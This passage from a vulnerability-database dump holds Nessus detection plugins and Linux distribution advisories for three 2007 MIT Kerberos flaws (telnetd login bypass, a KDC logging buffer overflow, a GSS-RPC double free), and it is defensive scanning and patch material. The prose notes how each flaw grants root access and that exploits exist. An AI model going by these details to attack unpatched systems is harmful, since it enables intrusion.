implementation of the Kerberos network authentication\nprotocol suite, which may lead to the execution of arbitrary code. The\nCommon Vulnerabilities and Exposures project identifies the following\nproblems :\n\n - CVE-2007-0956\n It was discovered that the krb5 telnet daemon performs\n insufficient validation of usernames, which might allow\n unauthorized logins or privilege escalation.\n\n - CVE-2007-0957\n iDefense discovered that a buffer overflow in the\n logging code of the KDC and the administration daemon\n might lead to arbitrary code execution.\n\n - CVE-2007-1216\n It was discovered that a double free in the RPCSEC_GSS\n part of the GSS library code might lead to arbitrary\n code execution.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-0956\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-0957\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-1216\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2007/dsa-1276\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the Kerberos packages.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 1.3.6-2sarge4.\n\nFor the upcoming stable distribution (etch) these problems have been\nfixed in version 1.4.4-7etch1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/04/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"krb5-admin-server\", reference:\"1.3.6-2sarge4\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"krb5-clients\", reference:\"1.3.6-2sarge4\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"krb5-doc\", reference:\"1.3.6-2sarge4\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"krb5-ftpd\", reference:\"1.3.6-2sarge4\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"krb5-kdc\", reference:\"1.3.6-2sarge4\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"krb5-rsh-server\", reference:\"1.3.6-2sarge4\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"krb5-telnetd\", reference:\"1.3.6-2sarge4\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"krb5-user\", reference:\"1.3.6-2sarge4\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libkadm55\", reference:\"1.3.6-2sarge4\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libkrb5-dev\", reference:\"1.3.6-2sarge4\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libkrb53\", reference:\"1.3.6-2sarge4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"krb5-admin-server\", reference:\"1.4.4-7etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"krb5-clients\", reference:\"1.4.4-7etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"krb5-doc\", reference:\"1.4.4-7etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"krb5-ftpd\", reference:\"1.4.4-7etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"krb5-kdc\", reference:\"1.4.4-7etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"krb5-rsh-server\", reference:\"1.4.4-7etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"krb5-telnetd\", reference:\"1.4.4-7etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"krb5-user\", reference:\"1.4.4-7etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libkadm55\", reference:\"1.4.4-7etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libkrb5-dbg\", reference:\"1.4.4-7etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libkrb5-dev\", reference:\"1.4.4-7etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libkrb53\", reference:\"1.4.4-7etch1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:56:11", "description": "The krb5 telnet service did not appropriately verify user names. A\nremote attacker could log in as the root user by requesting a\nspecially crafted user name. (CVE-2007-0956)\n\nThe krb5 syslog library did not correctly verify the size of log\nmessages. A remote attacker could send a specially crafted message and\nexecute arbitrary code with root privileges. (CVE-2007-0957)\n\nThe krb5 administration service was vulnerable to a double-free in the\nGSS RPC library. A remote attacker could send a specially crafted\nrequest and execute arbitrary code with root privileges.\n(CVE-2007-1216).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2007-11-10T00:00:00", "title": "Ubuntu 5.10 / 6.06 LTS / 6.10 : krb5 vulnerabilities (USN-449-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1216"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libkrb5-dbg", "cpe:/o:canonical:ubuntu_linux:6.10", "p-cpe:/a:canonical:ubuntu_linux:krb5-admin-server", "p-cpe:/a:canonical:ubuntu_linux:krb5-doc", "p-cpe:/a:canonical:ubuntu_linux:krb5-ftpd", "p-cpe:/a:canonical:ubuntu_linux:krb5-kdc", "p-cpe:/a:canonical:ubuntu_linux:krb5-rsh-server", "p-cpe:/a:canonical:ubuntu_linux:krb5-user", "p-cpe:/a:canonical:ubuntu_linux:krb5-clients", "p-cpe:/a:canonical:ubuntu_linux:krb5-telnetd", "p-cpe:/a:canonical:ubuntu_linux:libkadm55", "cpe:/o:canonical:ubuntu_linux:5.10", "p-cpe:/a:canonical:ubuntu_linux:libkrb53", "p-cpe:/a:canonical:ubuntu_linux:libkrb5-dev", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts"], "id": "UBUNTU_USN-449-1.NASL", "href": "https://www.tenable.com/plugins/nessus/28046", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-449-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(28046);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2019/08/02 13:33:01\");\n\n script_cve_id(\"CVE-2007-0956\", \"CVE-2007-0957\", \"CVE-2007-1216\");\n script_xref(name:\"USN\", value:\"449-1\");\n\n script_name(english:\"Ubuntu 5.10 / 6.06 LTS / 6.10 : krb5 vulnerabilities (USN-449-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The krb5 telnet service did not appropriately verify user names. A\nremote attacker could log in as the root user by requesting a\nspecially crafted user name. (CVE-2007-0956)\n\nThe krb5 syslog library did not correctly verify the size of log\nmessages. A remote attacker could send a specially crafted message and\nexecute arbitrary code with root privileges. (CVE-2007-0957)\n\nThe krb5 administration service was vulnerable to a double-free in the\nGSS RPC library. A remote attacker could send a specially crafted\nrequest and execute arbitrary code with root privileges.\n(CVE-2007-1216).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/449-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-admin-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-ftpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-kdc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-rsh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-telnetd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-user\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libkadm55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libkrb5-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libkrb5-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libkrb53\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2007-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(5\\.10|6\\.06|6\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 5.10 / 6.06 / 6.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"5.10\", pkgname:\"krb5-admin-server\", pkgver:\"1.3.6-4ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"krb5-clients\", pkgver:\"1.3.6-4ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"krb5-doc\", pkgver:\"1.3.6-4ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"krb5-ftpd\", pkgver:\"1.3.6-4ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"krb5-kdc\", pkgver:\"1.3.6-4ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"krb5-rsh-server\", pkgver:\"1.3.6-4ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"krb5-telnetd\", pkgver:\"1.3.6-4ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"krb5-user\", pkgver:\"1.3.6-4ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libkadm55\", pkgver:\"1.3.6-4ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libkrb5-dev\", pkgver:\"1.3.6-4ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libkrb53\", pkgver:\"1.3.6-4ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"krb5-admin-server\", pkgver:\"1.4.3-5ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"krb5-clients\", pkgver:\"1.4.3-5ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"krb5-doc\", pkgver:\"1.4.3-5ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"krb5-ftpd\", pkgver:\"1.4.3-5ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"krb5-kdc\", pkgver:\"1.4.3-5ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"krb5-rsh-server\", pkgver:\"1.4.3-5ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"krb5-telnetd\", pkgver:\"1.4.3-5ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"krb5-user\", pkgver:\"1.4.3-5ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libkadm55\", pkgver:\"1.4.3-5ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libkrb5-dev\", pkgver:\"1.4.3-5ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libkrb53\", pkgver:\"1.4.3-5ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"krb5-admin-server\", pkgver:\"1.4.3-9ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"krb5-clients\", pkgver:\"1.4.3-9ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"krb5-doc\", pkgver:\"1.4.3-9ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"krb5-ftpd\", pkgver:\"1.4.3-9ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"krb5-kdc\", pkgver:\"1.4.3-9ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"krb5-rsh-server\", pkgver:\"1.4.3-9ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"krb5-telnetd\", pkgver:\"1.4.3-9ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"krb5-user\", pkgver:\"1.4.3-9ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libkadm55\", pkgver:\"1.4.3-9ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libkrb5-dbg\", pkgver:\"1.4.3-9ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libkrb5-dev\", pkgver:\"1.4.3-9ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libkrb53\", pkgver:\"1.4.3-9ubuntu1.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"krb5-admin-server / krb5-clients / krb5-doc / krb5-ftpd / krb5-kdc / etc\");\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T11:51:42", "description": "A vulnerability was found in the username handling of the MIT krb5\ntelnet daemon. A remote attacker that could access the telnet port of\na target machine could login as root without requiring a password\n(CVE-2007-0956).\n\nBuffer overflows in the kadmin server daemon were discovered that\ncould be exploited by a remote attacker able to access the KDC.\nSuccessful exploitation could allow for the execution of arbitrary\ncode with the privileges of the KDC or kadmin server processes\n(CVE-2007-0957).\n\nFinally, a double-free flaw was discovered in the GSSAPI library used\nby the kadmin server daemon, which could lead to a denial of service\ncondition or the execution of arbitrary code with the privileges of\nthe KDC or kadmin server processes (CVE-2007-1216).\n\nUpdated packages have been patched to address this issue.\n\nUpdate :\n\nPackages for Mandriva Linux 2007.1 are now available.", "edition": 25, "published": "2007-04-05T00:00:00", "title": "Mandrake Linux Security Advisory : krb5 (MDKSA-2007:077-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1216"], "modified": "2007-04-05T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:krb5-workstation", "p-cpe:/a:mandriva:linux:libkrb53", "p-cpe:/a:mandriva:linux:krb5-server", "cpe:/o:mandriva:linux:2007.1", "p-cpe:/a:mandriva:linux:ftp-server-krb5", "p-cpe:/a:mandriva:linux:lib64krb53-devel", "p-cpe:/a:mandriva:linux:lib64krb53", "p-cpe:/a:mandriva:linux:ftp-client-krb5", "p-cpe:/a:mandriva:linux:libkrb53-devel", "p-cpe:/a:mandriva:linux:telnet-client-krb5", "p-cpe:/a:mandriva:linux:telnet-server-krb5"], "id": "MANDRAKE_MDKSA-2007-077.NASL", "href": "https://www.tenable.com/plugins/nessus/24943", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2007:077. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24943);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2007-0956\", \"CVE-2007-0957\", \"CVE-2007-1216\");\n script_bugtraq_id(23281, 23282, 23285);\n script_xref(name:\"MDKSA\", value:\"2007:077-1\");\n\n script_name(english:\"Mandrake Linux Security Advisory : krb5 (MDKSA-2007:077-1)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability was found in the username handling of the MIT krb5\ntelnet daemon. A remote attacker that could access the telnet port of\na target machine could login as root without requiring a password\n(CVE-2007-0956).\n\nBuffer overflows in the kadmin server daemon were discovered that\ncould be exploited by a remote attacker able to access the KDC.\nSuccessful exploitation could allow for the execution of arbitrary\ncode with the privileges of the KDC or kadmin server processes\n(CVE-2007-0957).\n\nFinally, a double-free flaw was discovered in the GSSAPI library used\nby the kadmin server daemon, which could lead to a denial of service\ncondition or the execution of arbitrary code with the privileges of\nthe KDC or kadmin server processes (CVE-2007-1216).\n\nUpdated packages have been patched to address this issue.\n\nUpdate :\n\nPackages for Mandriva Linux 2007.1 are now available.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2007-001-telnetd.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2007-002-syslog.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2007-003.txt\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ftp-client-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ftp-server-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:krb5-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:krb5-workstation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64krb53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64krb53-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libkrb53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libkrb53-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:telnet-client-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:telnet-server-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/04/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2007.1\", reference:\"ftp-client-krb5-1.5.2-6.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"ftp-server-krb5-1.5.2-6.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"krb5-server-1.5.2-6.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"krb5-workstation-1.5.2-6.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", reference:\"lib64krb53-1.5.2-6.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", reference:\"lib64krb53-devel-1.5.2-6.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"libkrb53-1.5.2-6.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"libkrb53-devel-1.5.2-6.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"telnet-client-krb5-1.5.2-6.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"telnet-server-krb5-1.5.2-6.1mdv2007.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-09T01:43:59", "bulletinFamily": "unix", "cvelist": ["CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1216"], "description": "The krb5 telnet service did not appropriately verify user names. A \nremote attacker could log in as the root user by requesting a specially \ncrafted user name. (CVE-2007-0956)\n\nThe krb5 syslog library did not correctly verify the size of log \nmessages. A remote attacker could send a specially crafted message and \nexecute arbitrary code with root privileges. (CVE-2007-0957)\n\nThe krb5 administration service was vulnerable to a double-free in the \nGSS RPC library. A remote attacker could send a specially crafted \nrequest and execute arbitrary code with root privileges. (CVE-2007-1216)", "edition": 6, "modified": "2007-04-04T00:00:00", "published": "2007-04-04T00:00:00", "id": "USN-449-1", "href": "https://ubuntu.com/security/notices/USN-449-1", "title": "krb5 vulnerabilities", "type": "ubuntu", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:14", "bulletinFamily": "unix", "cvelist": ["CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1216"], "description": "### Background\n\nMIT Kerberos 5 is a suite of applications that implement the Kerberos network protocol. \n\n### Description\n\nThe Kerberos telnet daemon fails to properly handle usernames allowing unauthorized access to any account (CVE-2007-0956). The Kerberos administration daemon, the KDC and possibly other applications using the MIT Kerberos libraries are vulnerable to the following issues. The krb5_klog_syslog function from the kadm5 library fails to properly validate input leading to a stack overflow (CVE-2007-0957). The GSS-API library is vulnerable to a double-free attack (CVE-2007-1216). \n\n### Impact\n\nBy exploiting the telnet vulnerability a remote attacker may obtain access with root privileges. The remaining vulnerabilities may allow an authenticated remote attacker to execute arbitrary code with root privileges. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll MIT Kerberos 5 users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-crypt/mit-krb5-1.5.2-r1\"", "edition": 1, "modified": "2007-04-03T00:00:00", "published": "2007-04-03T00:00:00", "id": "GLSA-200704-02", "href": "https://security.gentoo.org/glsa/200704-02", "type": "gentoo", "title": "MIT Kerberos 5: Arbitrary remote code execution", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2019-12-20T18:24:59", "bulletinFamily": "unix", "cvelist": ["CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1216"], "description": "**CentOS Errata and Security Advisory** CESA-2007:0095-01\n\n\nKerberos is a network authentication system which allows clients and\r\nservers to authenticate to each other through use of symmetric encryption\r\nand a trusted third party, the KDC.\r\n\r\nA flaw was found in the username handling of the MIT krb5 telnet daemon\r\n(telnetd). A remote attacker who can access the telnet port 